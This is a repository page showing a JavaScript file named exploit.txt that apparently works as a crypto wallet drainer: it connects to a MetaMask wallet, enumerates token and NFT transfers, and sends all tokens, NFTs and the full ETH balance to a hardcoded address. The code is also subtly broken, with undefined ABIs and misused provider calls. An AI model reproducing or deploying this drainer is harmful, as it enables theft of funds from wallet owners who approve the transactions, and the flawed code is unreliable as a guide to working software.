-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathexploit.txt
151 lines (126 loc) · 5.12 KB
/
exploit.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
const axios = require('axios');
const { ethers } = require('ethers');
// Connect to Metamask wallet
async function connectToMetamask() {
// Check if Metamask is installed
if (typeof window.ethereum === 'undefined') {
throw new Error('Metamask is not installed');
}
// Request access to the user's accounts
await window.ethereum.request({ method: 'eth_requestAccounts' });
// Create a provider using Metamask's provider
const provider = new ethers.providers.Web3Provider(window.ethereum);
// Get the signer (account) from the provider
const signer = provider.getSigner();
// Return the signer
return signer;
}
// Retrieve token and NFT transfers from wallet transactions
async function retrieveTokenAndNFTTransfers(address) {
try {
const apiKey = 'YOUR_ETHERSCAN_API_KEY'; // Replace with your Etherscan API key
const apiUrl = `https://api.etherscan.io/api?module=account&action=txlist&address=${address}&apikey=${apiKey}`;
// Fetch wallet transactions from Etherscan API
const response = await axios.get(apiUrl);
const transactions = response.data.result;
const tokenTransfers = [];
const nftTransfers = [];
// Iterate through transactions and extract token and NFT transfers
for (const tx of transactions) {
// Get the transaction receipt for additional details
const txReceipt = await ethers.provider.getTransactionReceipt(tx.hash);
// Check if the transaction is a token transfer
if (txReceipt.logs.length > 0) {
for (const log of txReceipt.logs) {
try {
// Decode the log data to check for ERC20 transfer event
const iface = new ethers.utils.Interface(['event Transfer(address indexed from, address indexed to, uint256 value)']);
const parsedLog = iface.parseLog(log);
if (parsedLog.name === 'Transfer') {
const tokenTransfer = {
tokenAddress: log.address,
from: parsedLog.args.from,
to: parsedLog.args.to,
value: parsedLog.args.value,
};
tokenTransfers.push(tokenTransfer);
}
} catch (error) {
// Ignore decoding errors
}
}
}
// Check if the transaction is an NFT transfer
if (txReceipt.logsBloom.includes('0x23b872dd')) {
const nftTransfer = {
tokenAddress: tx.to,
from: tx.from,
to: txReceipt.logs[0].topics[2],
tokenId: txReceipt.logs[0].topics[3],
};
nftTransfers.push(nftTransfer);
}
}
return { tokenTransfers, nftTransfers };
} catch (error) {
throw new Error('Failed to retrieve token and NFT transfers:', error);
}
}
// Transfer all tokens to a new wallet
async function transferTokens(newWalletAddress, tokenTransfers) {
for (const transfer of tokenTransfers) {
try {
const signer = await connectToMetamask();
const tokenContract = new ethers.Contract(transfer.tokenAddress, tokenABI, signer);
const tokenBalance = await tokenContract.balanceOf(transfer.from);
if (tokenBalance.gt(0)) {
await tokenContract.transfer(newWalletAddress, tokenBalance);
console.log(`Transferred ${tokenBalance} tokens from ${transfer.from} to ${newWalletAddress}`);
}
} catch (error) {
console.error('Token transfer failed:', error);
}
}
}
// Transfer all NFTs to a new wallet
async function transferNFTs(newWalletAddress, nftTransfers) {
for (const transfer of nftTransfers) {
try {
const signer = await connectToMetamask();
const nftContract = new ethers.Contract(transfer.tokenAddress, nftABI, signer);
const nftOwner = await nftContract.ownerOf(transfer.tokenId);
if (nftOwner.toLowerCase() === transfer.from.toLowerCase()) {
await nftContract.transferFrom(transfer.from, newWalletAddress, transfer.tokenId);
console.log(`Transferred NFT ${transfer.tokenId} from ${transfer.from} to ${newWalletAddress}`);
}
} catch (error) {
console.error('NFT transfer failed:', error);
}
}
}
// Example usage: transfer funds and tokens to a new wallet
async function transferFundsAndTokens(newWalletAddress) {
try {
const signer = await connectToMetamask();
const currentAddress = await signer.getAddress();
const { tokenTransfers, nftTransfers } = await retrieveTokenAndNFTTransfers(currentAddress);
// Transfer all tokens to the new wallet
await transferTokens(newWalletAddress, tokenTransfers);
// Transfer all NFTs to the new wallet
await transferNFTs(newWalletAddress, nftTransfers);
// Transfer all ETH to the new wallet
const ethBalance = await signer.getBalance();
const transaction = await signer.sendTransaction({
to: newWalletAddress,
value: ethBalance,
});
// Wait for the transaction to be mined
await transaction.wait();
console.log('Transfer successful!');
} catch (error) {
console.error('Transfer failed:', error);
}
}
// Example usage: transfer funds and tokens to a new wallet
const newWalletAddress = '0xabcdef1234567890abcdef1234567890abcdef12';
transferFundsAndTokens(newWalletAddress);